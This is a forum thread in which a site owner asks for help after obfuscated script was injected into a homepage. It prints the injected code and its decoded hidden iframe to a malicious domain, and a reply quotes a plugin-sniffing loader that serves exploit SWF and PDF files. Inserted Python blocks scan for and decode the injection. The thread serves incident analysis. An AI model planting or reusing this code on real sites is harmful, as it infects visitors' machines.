Someone hacked my website!

h@ck3r

New Member
My forum is located here:

/forum

In the root of my domain, I only have an index.php file which is like a disclaimer, within only basic HTML (Enter/ Don't enter).

Problem is, the past few days members started reporting that their anti-virus etc. was saying my website is a malicious site, and warning of a virus.

I use Nod32 and Avast on my PCs, and I was not getting any warning message, but when I visited the root of my domain (index.php), it would auto start ACROBATREADER.EXE

It would start using VERY HIGH memory resources, but seem to do nothing else.

After I looked into things closely, I examined the index.php file and found the following code has somehow been added to the file:

PHP:
<?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo '<script type="text/javascript">var jfbqwCRgMagVAISgjojw = "uxN60uxN105uxN102uxN114uxN97uxN109uxN101uxN32uxN119uxN105uxN100uxN116uxN104uxN61uxN34uxN52uxN56uxN48uxN34uxN32uxN104uxN101uxN105uxN103uxN104uxN116uxN61uxN34uxN54uxN48uxN34uxN32uxN115uxN114uxN99uxN61uxN34uxN104uxN116uxN116uxN112uxN58uxN47uxN47uxN112uxN114uxN111uxN102uxN105uxN45uxN116uxN111uxN111uxN108uxN116uxN105uxN112uxN46uxN98uxN105uxN122uxN47uxN98uxN108uxN111uxN103uxN47uxN102uxN101uxN101uxN100uxN46uxN104uxN116uxN109uxN108uxN34uxN32uxN115uxN116uxN121uxN108uxN101uxN61uxN34uxN98uxN111uxN114uxN100uxN101uxN114uxN58uxN48uxN112uxN120uxN59uxN32uxN112uxN111uxN115uxN105uxN116uxN105uxN111uxN110uxN58uxN114uxN101uxN108uxN97uxN116uxN105uxN118uxN101uxN59uxN32uxN116uxN111uxN112uxN58uxN48uxN112uxN120uxN59uxN32uxN108uxN101uxN102uxN116uxN58uxN45uxN53uxN48uxN48uxN112uxN120uxN59uxN32uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN59uxN32uxN102uxN105uxN108uxN116uxN101uxN114uxN58uxN112uxN114uxN111uxN103uxN105uxN100uxN58uxN68uxN88uxN73uxN109uxN97uxN103uxN101uxN84uxN114uxN97uxN110uxN115uxN102uxN111uxN114uxN109uxN46uxN77uxN105uxN99uxN114uxN111uxN115uxN111uxN102uxN116uxN46uxN65uxN108uxN112uxN104uxN97uxN40uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN61uxN48uxN41uxN59uxN32uxN45uxN109uxN111uxN122uxN45uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN34uxN62uxN60uxN47uxN105uxN102uxN114uxN97uxN109uxN101uxN62";var pCtNiMOUYGQHlsyivQPI = jfbqwCRgMagVAISgjojw.split("uxN");var qwdrEwYolHlaKeosrDNQ = "";for (var JdXvWWeRmuZdqDUuzsjk=1; JdXvWWeRmuZdqDUuzsjk<pCtNiMOUYGQHlsyivQPI.length; JdXvWWeRmuZdqDUuzsjk++){qwdrEwYolHlaKeosrDNQ+=String.fromCharCode(pCtNiMOUYGQHlsyivQPI[JdXvWWeRmuZdqDUuzsjk]);}document.write(qwdrEwYolHlaKeosrDNQ)</script>'; ?>

Can anyone tell me how someone's done this as I am the only person with FTP access to my website, other than my host.

I've removed this code from the index.php file now and it seems to be fine.. But I want to make sure this cannot happen again.

I've also changed the index.php file for an index.html file.

I'm also worried that they have uploaded something else on my server too, and not just added this coding. Is there any way to scan the server for a virus? Is this something my host would need to do?

Can anyone give me any help with this as I need to make sure it doesn't happen again, and that I've totally got rid of it.

Can't believe this has happened, after only posting in this thread a couple of days ago!

Is there any way this code has been added to my index.php file because of this? As that's when it all started- as soon as I added dock in rock (I've removed it now).

Thanks for any help.
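One way to answer the "is there anything else on the server" question is to sweep the web root for files that carry the same fingerprints as the injected script above: a run of empty `<?php echo ''; ?>` padding, a `String.fromCharCode` loop feeding `document.write`, and an iframe pushed off-screen or made transparent. The scanner below is an added example, not code from the thread; the demo web root and the short injected stand-in it builds are constructed for the demonstration, and a hit means "open this file and look", not "this file is definitely malicious".

```python
"""Sweep a web root for files that look like the injected index.php above.

Added example (not from the thread). Heuristic string matching only;
run it over a copy of the site and review every hit by hand.
"""
import os
import re
import tempfile

# (label, regex) pairs modelled on the injection posted in the first post:
# empty PHP echo padding, a charcode-array decoder written into the page,
# and an iframe hidden via opacity/off-screen offset/zero size.
INDICATORS = [
    ("php-echo-padding", re.compile(r"(<\?php echo ''; \?>\s*){3,}")),
    ("charcode-decoder", re.compile(r"String\.fromCharCode[\s\S]{0,300}document\.write")),
    ("hidden-iframe", re.compile(
        r'<iframe[^>]*(opacity\s*:\s*0|left\s*:\s*-\d{3,}px|width="?0"?|height="?0"?)', re.I)),
]

WEB_EXTS = (".php", ".html", ".htm", ".js", ".htaccess")


def scan_file(path, max_bytes=2_000_000):
    """Return the list of indicator labels that match the file's content."""
    try:
        with open(path, "rb") as fh:
            data = fh.read(max_bytes)
    except OSError:
        return []
    text = data.decode("utf-8", errors="replace")
    return [label for label, rx in INDICATORS if rx.search(text)]


def scan_webroot(root):
    """Walk the tree and map relative path -> matched labels for every hit."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(WEB_EXTS):
                continue
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


# Constructed demo content (not real site files). INJECTED has the same
# shape as the posted script (padding, split/fromCharCode loop,
# document.write) but decodes to the harmless string "hi".
CLEAN = "<html><body><a href='/forum'>Enter</a></body></html>\n"
INJECTED = (
    "<?php echo ''; ?><?php echo ''; ?><?php echo ''; ?>"
    "<?php echo '<script>var a=\"uxN104uxN105\".split(\"uxN\");var s=\"\";"
    "for(var i=1;i<a.length;i++){s+=String.fromCharCode(a[i]);}"
    "document.write(s)</script>'; ?>\n"
)


def build_demo_root():
    """Create a throwaway web root: clean /forum/index.php, injected /index.php."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "forum"))
    with open(os.path.join(root, "forum", "index.php"), "w") as fh:
        fh.write(CLEAN)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write(INJECTED)
    return root


def demo_findings():
    """Build the demo root and scan it; only index.php should be flagged."""
    return scan_webroot(build_demo_root())


if __name__ == "__main__":
    for rel, hits in sorted(demo_findings().items()):
        print(f"{rel}: {', '.join(hits)}")
```

Pair the sweep with a modification-time check (`find /path/to/webroot -newer /path/to/known-good-file`, or a stored list of hashes from a clean backup): the thread shows the injection coming back after removal, so the question is not only which files match today but which files changed since the last time the site was known clean.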
 

vForums

New Member
That's base25 code you're seeing, a way to disguise HTML. I've seen an exploit for 3.7.5 and up vBulletin; I'll try to post it here to get members aware. Seems they injected it into your header somehow, probably a shell contained in that code since it uses script codes..
 

mmmxiv

New Member
I use that dock in rock and I don't have that code. Believe me, I checked.

Though I did edit it a lot to my wishes.
 

h@ck3r

New Member
I cannot say 100% that it's down to Dock in Rock.. but for sure somehow this script has been injected to that index.php file, and I need to find out how this has been done :)
 

nagger

New Member
I looked into this a little bit.

That javascript blabla comes out to:

Code:
<iframe width="480" height="60" src="http://profi-tooltip.biz/blog/feed.html" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>

It opens an iframe to that dodgy site which then runs the script that contains 2 infected exploits, one being a .swf file and one being a .pdf

Code:
<script>
function mjnhyua() { return 'ra'+'m'; }
for(i=0;navigator.plugins[i];i++){
		regexp=new RegExp('.ho.+?wave.+?([0-9]+).+?([0-9]+).+?([0-9]+)');
var ertdfg = "dfgdfgdfgdf43565gkui";
		result=regexp.exec(navigator.plugins[i]['description']);
ertdfg = "dfgdfgdfgdf43565gkui";
		if(result!=null && result[1]==9 && result[2]==0 && result[3]<124) {
ertdfg = "dfgdfgdfgdf43565gkui";
			document.write('<if'+mjnhyua()+'e src="fmocs.swf"></if'+mjnhyua()+'e>');
ertdfg = "dfgdfgdfgdf43565gkui";
			break;
		}
}
for(i=0;navigator.plugins[i];i++){
		name=navigator.plugins[i].name;
		if(name.indexOf('Adobe Acrobat')!=-1){
			document.write('<if'+mjnhyua()+'e src="fnocs.pdf"></if'+mjnhyua()+'e>');
			break;
		}
}
</script>

File: fmocs.swf Status: INFECTED/MALWARE MD5: 04edba09fc62d7f8ed56a346491a3125
Specifically crafted SWF (flash) files allow remote file execution when the client has a vulnerable FlashPlayer. A malformed SWF record's value triggers a buffer overflow. The size of the SWF files varies. Usually it's a download-and-execute shellcode used to download and run a PasswordStealer trojan. It seems that all versions of FlashPlayer up to 9.0.124.0 are vulnerable (though we saw malicious pages trying to exploit only versions 115 and 47).

The other file, the PDF, is this: a generic detection for specially crafted PDF files which exploit different vulnerabilities found in Adobe PDF Reader's JavaScript engine in order to execute malicious code on the user's computer. The exploitation mainly involves the following two functions:

util.printf() - if an attacker sends a string long enough to generate a stack-based buffer overflow he will then be able to execute arbitrary code on the user's computer with the same level privileges as the user who opened the PDF file.

Collab.collectEmailInfo() - a stack-based buffer overflow can be caused by passing a string long enough (at least 44952 characters) as a parameter in the msg field of this function.

The Javascript function containing the actual exploit is specified in the OpenAction tag of the PDF file. Usually this function is encoded using zlib. After decompression sometimes the script is still obscured through one or more layers of encoding in order to avoid detection and make analysis more difficult.
The javascript code inside the PDF file is used to download and execute other malware on user's computer.


I can conclude that the following people are vulnerable to this exploit:
people using FlashPlayer 9.0.124.0 and below, or Adobe Acrobat Reader before 8.1.2
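The decoding nagger did by hand can be done offline without loading the page in a browser: the injected script is just a list of decimal character codes joined by the separator `uxN`, and the JavaScript loop turns each code back into a character and writes the result into the page. The Python below is an added example, not code from the thread or from any of the posters; it re-implements that decode step on the script copied from the first post, so the hidden iframe (and its `src`) can be read from a file on disk. The `SCRIPT` constant is assembled from the posted code; the helper names are the example's own.

```python
"""Decode the charcode-obfuscated string from the injected script.

Added example (not from the thread). Re-implements in Python what the
injected JavaScript does at load time, so the payload can be read
without executing it in a browser.
"""
import re

# The encoded literal from the first post, split into chunks for readability
# (each chunk decodes to one attribute or path fragment of the iframe).
ENCODED = (
    "uxN60uxN105uxN102uxN114uxN97uxN109uxN101uxN32"
    "uxN119uxN105uxN100uxN116uxN104uxN61uxN34uxN52uxN56uxN48uxN34uxN32"
    "uxN104uxN101uxN105uxN103uxN104uxN116uxN61uxN34uxN54uxN48uxN34uxN32"
    "uxN115uxN114uxN99uxN61uxN34"
    "uxN104uxN116uxN116uxN112uxN58uxN47uxN47"
    "uxN112uxN114uxN111uxN102uxN105uxN45uxN116uxN111uxN111uxN108uxN116uxN105uxN112uxN46uxN98uxN105uxN122"
    "uxN47uxN98uxN108uxN111uxN103uxN47uxN102uxN101uxN101uxN100uxN46uxN104uxN116uxN109uxN108uxN34uxN32"
    "uxN115uxN116uxN121uxN108uxN101uxN61uxN34"
    "uxN98uxN111uxN114uxN100uxN101uxN114uxN58uxN48uxN112uxN120uxN59uxN32"
    "uxN112uxN111uxN115uxN105uxN116uxN105uxN111uxN110uxN58uxN114uxN101uxN108uxN97uxN116uxN105uxN118uxN101uxN59uxN32"
    "uxN116uxN111uxN112uxN58uxN48uxN112uxN120uxN59uxN32"
    "uxN108uxN101uxN102uxN116uxN58uxN45uxN53uxN48uxN48uxN112uxN120uxN59uxN32"
    "uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN59uxN32"
    "uxN102uxN105uxN108uxN116uxN101uxN114uxN58uxN112uxN114uxN111uxN103uxN105uxN100uxN58"
    "uxN68uxN88uxN73uxN109uxN97uxN103uxN101uxN84uxN114uxN97uxN110uxN115uxN102uxN111uxN114uxN109uxN46"
    "uxN77uxN105uxN99uxN114uxN111uxN115uxN111uxN102uxN116uxN46"
    "uxN65uxN108uxN112uxN104uxN97uxN40uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN61uxN48uxN41uxN59uxN32"
    "uxN45uxN109uxN111uxN122uxN45uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN34"
    "uxN62uxN60uxN47uxN105uxN102uxN114uxN97uxN109uxN101uxN62"
)

# The posted script, with the literal above in place (variable names as posted).
SCRIPT = (
    '<script type="text/javascript">var jfbqwCRgMagVAISgjojw = "' + ENCODED + '";'
    'var pCtNiMOUYGQHlsyivQPI = jfbqwCRgMagVAISgjojw.split("uxN");'
    'var qwdrEwYolHlaKeosrDNQ = "";'
    'for (var JdXvWWeRmuZdqDUuzsjk=1; JdXvWWeRmuZdqDUuzsjk<pCtNiMOUYGQHlsyivQPI.length; '
    'JdXvWWeRmuZdqDUuzsjk++){qwdrEwYolHlaKeosrDNQ+='
    'String.fromCharCode(pCtNiMOUYGQHlsyivQPI[JdXvWWeRmuZdqDUuzsjk]);}'
    'document.write(qwdrEwYolHlaKeosrDNQ)</script>'
)


def decode_charcodes(blob, sep="uxN"):
    """Split on the separator and map each decimal code to its character.

    The first element is empty because the text starts with the separator;
    skipping it mirrors the JavaScript loop that starts at index 1.
    """
    return "".join(chr(int(p)) for p in blob.split(sep)[1:] if p)


def decode_script(script_text):
    """Recover separator and encoded literal from a script of this shape, then decode.

    The separator is whatever is passed to .split(); the literal is the first
    quoted string made only of separator+digits repetitions.
    """
    sep = re.search(r'\.split\("([^"]+)"\)', script_text).group(1)
    blob = re.search(r'"((?:%s\d+)+)"' % re.escape(sep), script_text).group(1)
    return decode_charcodes(blob, sep)


def iframe_sources(html):
    """List the src URLs of every iframe in the decoded markup."""
    return re.findall(r'<iframe[^>]*\ssrc="([^"]+)"', html, re.I)


if __name__ == "__main__":
    decoded = decode_script(SCRIPT)
    print(decoded)
    print("iframe targets:", iframe_sources(decoded))
```

Running it on the posted script yields the same `<iframe ... src="http://profi-tooltip.biz/blog/feed.html" ...>` line nagger quoted, with the `left:-500px; opacity:0` styling that keeps it invisible to the visitor. The same two-regex approach works on other samples of this family as long as they keep the `split("<sep>")` plus `String.fromCharCode` structure; a different separator is picked up automatically.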
 

h@ck3r

New Member
Thanks for the above- Appreciated.

But after doing a boot scan with Avast (Nod32 never found anything), I deleted a LOT of stuff from my PC, and I thought it had gone.

But today the same error appeared again on my website. The code had somehow been injected to my index.html page.

:(
 

monoxera

New Member
I think you should try export / backup db, delete your FTP, install vb again, import using IMPEX.

Really, that's what I would do. Sorry if I didn't help. Just wanted to give my opinion :)
 

h@ck3r

New Member
monoxera said:
I think you should try export / backup db, delete your FTP, install vb again, import using IMPEX.

Really, that's what I would do. Sorry if I didn't help. Just wanted to give my opinion :)

Cheers bud but my VB is not hacked.

VB is in the /forum directory.

The file that has been hacked twice now is my own custom made index.html / index.php file that's in the root of my domain.

I've now removed this file, and setup a redirect in my .htaccess file.

Fingers crossed the /forum/index.php file doesn't get injected with this script now though.

Although I'm still trying to find out how I've been hacked in the first place.
 

vForums

New Member
Seems like a <script> code executed from an XSS vuln in your site. Maybe /admincp/redirect=<script> etc. etc.
 

h@ck3r

New Member
vForums said:
Seems like a <script> code executed from an XSS vuln in your site. Maybe /admincp/redirect=<script> etc. etc.

Sorry to sound dumb but could you explain that in simple terms (If poss) to me? :D

Are you saying that something I've installed (xss file) could be injecting this code?
 

bouncer

New Member
nagger said:
I can conclude that the following people are vurnable to this exploit:
people using FlashPlayer 9.0.124.0 and below, or adobe acrobat reader before 8.1.2
Is there a solution, sorry to be obtuse.
 

h@ck3r

New Member
KrazyFire said:
if u have cpanel do an antivirus check -.-

I've got CPanelX- Is that what you mean?

I don't see any antivirus checker in there though.. should there be? :/

EDIT: This is the cpanel I have-

capture1-7.jpg


Can't see any virus checker though.
 